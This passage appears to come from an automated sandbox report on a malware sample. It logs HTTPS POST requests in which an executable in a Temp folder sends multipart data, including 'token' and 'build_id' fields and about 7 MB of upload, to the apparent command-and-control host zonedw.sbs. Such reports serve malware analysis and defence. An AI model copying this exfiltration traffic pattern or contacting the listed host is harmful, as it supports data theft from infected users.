                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.449904116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ZUKFK6PZ58YM7QQ1V3OP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 6990993
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------ZUKFK6PZ58YM7QQ1V3OPContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------ZUKFK6PZ58YM7QQ1V3OPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ZUKFK6PZ58YM7QQ1V3OPCont
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:53:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.449918116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:02 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KXBA1VAI58YMYU379R1D
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
